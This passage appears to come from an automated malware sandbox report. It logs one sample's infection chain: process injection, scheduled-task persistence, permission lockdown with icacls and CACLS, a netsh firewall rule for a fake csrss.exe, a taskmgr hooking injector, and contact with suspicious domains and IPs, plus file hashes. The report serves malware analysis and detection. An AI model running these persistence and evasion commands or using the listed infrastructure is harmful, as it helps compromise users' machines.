| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Suspicious behavior: GetForegroundWindowSpam

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Suspicious behavior: MapViewOfSection

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\159.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4272.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1220 wrote to memory of 1724 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1220 wrote to memory of 1724 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1220 wrote to memory of 1724 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1220 wrote to memory of 1724 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1724 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Users\Admin\AppData\Local\Temp\FD04.exe |
| PID 1220 wrote to memory of 2520 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\159.exe |
| PID 1220 wrote to memory of 2520 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\159.exe |
| PID 1220 wrote to memory of 2520 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\159.exe |
| PID 1220 wrote to memory of 2520 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\159.exe |
| PID 1220 wrote to memory of 1616 | N/A | N/A | C:\Windows\system32\regsvr32.exe |
| PID 1220 wrote to memory of 1616 | N/A | N/A | C:\Windows\system32\regsvr32.exe |
| PID 1220 wrote to memory of 1616 | N/A | N/A | C:\Windows\system32\regsvr32.exe |
| PID 1220 wrote to memory of 1616 | N/A | N/A | C:\Windows\system32\regsvr32.exe |
| PID 1220 wrote to memory of 1616 | N/A | N/A | C:\Windows\system32\regsvr32.exe |
| PID 1616 wrote to memory of 2168 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1616 wrote to memory of 2168 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1616 wrote to memory of 2168 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1616 wrote to memory of 2168 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1616 wrote to memory of 2168 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1616 wrote to memory of 2168 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1616 wrote to memory of 2168 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1220 wrote to memory of 1644 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1854.exe |
| PID 1220 wrote to memory of 1644 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1854.exe |
| PID 1220 wrote to memory of 1644 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1854.exe |
| PID 1220 wrote to memory of 1644 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1854.exe |
| PID 2532 wrote to memory of 1340 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2532 wrote to memory of 1340 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2532 wrote to memory of 1340 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2532 wrote to memory of 1340 | N/A | C:\Users\Admin\AppData\Local\Temp\FD04.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1220 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe |
| PID 1220 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe |
| PID 1220 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe |
| PID 1220 wrote to memory of 2684 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe |
| PID 2684 wrote to memory of 2184 | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe |
| PID 2684 wrote to memory of 2184 | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe |
| PID 2684 wrote to memory of 2184 | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe |
| PID 2684 wrote to memory of 2184 | N/A | C:\Users\Admin\AppData\Local\Temp\214A.exe | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe |
| PID 1220 wrote to memory of 1480 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4272.exe |
| PID 1220 wrote to memory of 1480 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4272.exe |
| PID 1220 wrote to memory of 1480 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4272.exe |
| PID 1220 wrote to memory of 1480 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4272.exe |
| PID 1220 wrote to memory of 2784 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe |
| PID 1220 wrote to memory of 2784 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe |
| PID 1220 wrote to memory of 2784 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe |
| PID 1220 wrote to memory of 2784 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe |
| PID 1220 wrote to memory of 2784 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe |
| PID 2184 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 2184 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 2184 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 2184 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1220 wrote to memory of 1860 | N/A | N/A | C:\Windows\explorer.exe |
| PID 1220 wrote to memory of 1860 | N/A | N/A | C:\Windows\explorer.exe |
| PID 1220 wrote to memory of 1860 | N/A | N/A | C:\Windows\explorer.exe |
| PID 1220 wrote to memory of 1860 | N/A | N/A | C:\Windows\explorer.exe |

Uses Task Scheduler COM API

persistence

outlook_office_path

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A |

outlook_win_path

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A |

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\FD04.exe

C:\Users\Admin\AppData\Local\Temp\159.exe

C:\Users\Admin\AppData\Local\Temp\159.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\169E.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\169E.dll

C:\Users\Admin\AppData\Local\Temp\1854.exe

C:\Users\Admin\AppData\Local\Temp\1854.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\727fb0f1-09ae-4421-a570-c84a25e4aa61" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\214A.exe

C:\Users\Admin\AppData\Local\Temp\214A.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Users\Admin\AppData\Local\Temp\4272.exe

C:\Users\Admin\AppData\Local\Temp\4272.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\FD04.exe

"C:\Users\Admin\AppData\Local\Temp\FD04.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\FD04.exe

"C:\Users\Admin\AppData\Local\Temp\FD04.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231017165424.log C:\Windows\Logs\CBS\CbsPersist_20231017165424.cab

C:\Users\Admin\AppData\Local\Temp\4272.exe

"C:\Users\Admin\AppData\Local\Temp\4272.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build2.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe

"C:\Users\Admin\AppData\Local\34c87081-bcc2-466e-9a99-2a915e5105bd\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {BF383299-2619-4457-8E1A-077BC87DB665} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 onualituyrs.org udp
US 8.8.8.8:53 sumagulituyo.org udp
US 34.94.245.237:80 sumagulituyo.org tcp
US 8.8.8.8:53 snukerukeutit.org udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 liuliuoumumy.org udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
US 8.8.8.8:53 api.2ip.ua udp
US 188.114.97.0:443 api.2ip.ua tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 montereyclub.org udp
US 104.21.21.57:443 montereyclub.org tcp
US 8.8.8.8:53 loveperry.org udp
US 104.21.86.8:443 loveperry.org tcp
US 188.114.97.0:443 api.2ip.ua tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 zexeq.com udp
KR 211.181.24.132:80 zexeq.com tcp
UY 167.61.217.190:80 colisumy.com tcp
RU 31.41.244.27:41140 - tcp
FR 51.254.67.186:16176 - tcp
KR 211.181.24.132:80 zexeq.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 e923f592-13e1-4016-88b1-5bf5e78202c7.uuid.statsexplorer.org udp
US 8.8.8.8:53 crl.microsoft.com udp
US 2.18.121.143:80 crl.microsoft.com tcp
DE 49.12.118.149:80 49.12.118.149 tcp

Files

memory/2420-1-0x0000000000940000-0x0000000000A40000-memory.dmp

memory/2420-2-0x0000000000400000-0x00000000007CC000-memory.dmp

memory/2420-3-0x0000000000220000-0x000000000022B000-memory.dmp

memory/1220-4-0x0000000002700000-0x0000000002716000-memory.dmp

memory/2420-5-0x0000000000400000-0x00000000007CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/1724-20-0x0000000000340000-0x00000000003D2000-memory.dmp

memory/1724-21-0x0000000000340000-0x00000000003D2000-memory.dmp

memory/1724-22-0x0000000001FB0000-0x00000000020CB000-memory.dmp

\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2532-26-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2532-28-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1724-31-0x0000000000340000-0x00000000003D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/2532-36-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2520-35-0x00000000008D0000-0x0000000001078000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\159.exe

MD5 77f6f0504e40c95483da601ee1de4a4e
SHA1 628094e713d9f970b63091f6dec44f8feb6e26b2
SHA256 ad6a9a78ad3c6dceb908df1a46665b85c91888b4915fd514c0305048d8e8c111
SHA512 7e01b7917d61054360ef451a0a4a4be856e04bda77082fd63beae43e345af61c10d11f64021182913f74248b41b037a40d83e9cb6f2897a99001591bd2595b63

memory/2532-37-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2520-38-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-39-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-40-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-41-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-42-0x0000000076E60000-0x0000000076EA7000-memory.dmp

memory/2520-44-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-46-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-47-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-48-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-49-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-50-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-51-0x0000000076E60000-0x0000000076EA7000-memory.dmp

memory/2520-52-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-54-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-55-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-53-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-56-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-58-0x0000000077E80000-0x0000000077E82000-memory.dmp

memory/2520-57-0x00000000759A0000-0x0000000075AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\169E.dll

MD5 a43d9991721fcd1521677bf31c21ce21
SHA1 0e86179bdcf8685b9bd7da13cd9aa10218f0d81c
SHA256 6561ae7f88e51c053e856b98418192ff7aa85a4f7a16460fb769073fe4535197
SHA512 233bf239b73e9b398d2666ab21cd3ecf930b98c935cbe5e7d5f325fb8bdb9b7ec064a4aecc73228fbb9c35a9f0dd1503e2f66b6f18e5931d0f4567fc2dc02459

memory/2520-60-0x00000000008D0000-0x0000000001078000-memory.dmp

memory/2520-62-0x0000000074C00000-0x00000000752EE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1854.exe

MD5 9a31a97c4280c2f132874184bc1864eb
SHA1 424f3577733ecdf081cff3c0b765668fa94bf106
SHA256 d50a823a85ebd19a7e61abd091d90b5735c78a4f9f0f32f99c05846c2be45681
SHA512 01facbb50b5cc39e2f91f79e0c3b0448a5804650459c06ee1287f587376df474b30348d825efc8ea6fe2773762db5cad328dc07df53c1273208692d4662dd87c

\Users\Admin\AppData\Local\Temp\169E.dll

MD5 a43d9991721fcd1521677bf31c21ce21
SHA1 0e86179bdcf8685b9bd7da13cd9aa10218f0d81c
SHA256 6561ae7f88e51c053e856b98418192ff7aa85a4f7a16460fb769073fe4535197
SHA512 233bf239b73e9b398d2666ab21cd3ecf930b98c935cbe5e7d5f325fb8bdb9b7ec064a4aecc73228fbb9c35a9f0dd1503e2f66b6f18e5931d0f4567fc2dc02459

C:\Users\Admin\AppData\Local\Temp\1854.exe

MD5 9a31a97c4280c2f132874184bc1864eb
SHA1 424f3577733ecdf081cff3c0b765668fa94bf106
SHA256 d50a823a85ebd19a7e61abd091d90b5735c78a4f9f0f32f99c05846c2be45681
SHA512 01facbb50b5cc39e2f91f79e0c3b0448a5804650459c06ee1287f587376df474b30348d825efc8ea6fe2773762db5cad328dc07df53c1273208692d4662dd87c

memory/2168-84-0x0000000000180000-0x0000000000186000-memory.dmp

memory/2168-76-0x0000000010000000-0x00000000101E3000-memory.dmp

memory/2532-89-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\214A.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/2520-95-0x00000000008D0000-0x0000000001078000-memory.dmp

memory/2520-96-0x00000000759A0000-0x0000000075AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\727fb0f1-09ae-4421-a570-c84a25e4aa61\FD04.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\214A.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/2520-101-0x0000000076E60000-0x0000000076EA7000-memory.dmp

memory/2520-102-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-103-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2520-104-0x00000000759A0000-0x0000000075AB0000-memory.dmp

memory/2168-105-0x00000000022B0000-0x00000000023CB000-memory.dmp

memory/2168-106-0x0000000010000000-0x00000000101E3000-memory.dmp

memory/2168-107-0x0000000001E60000-0x0000000001F5F000-memory.dmp

memory/2168-110-0x0000000001E60000-0x0000000001F5F000-memory.dmp

memory/2168-112-0x0000000001E60000-0x0000000001F5F000-memory.dmp

memory/2520-113-0x0000000074C00000-0x00000000752EE000-memory.dmp

\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\4272.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

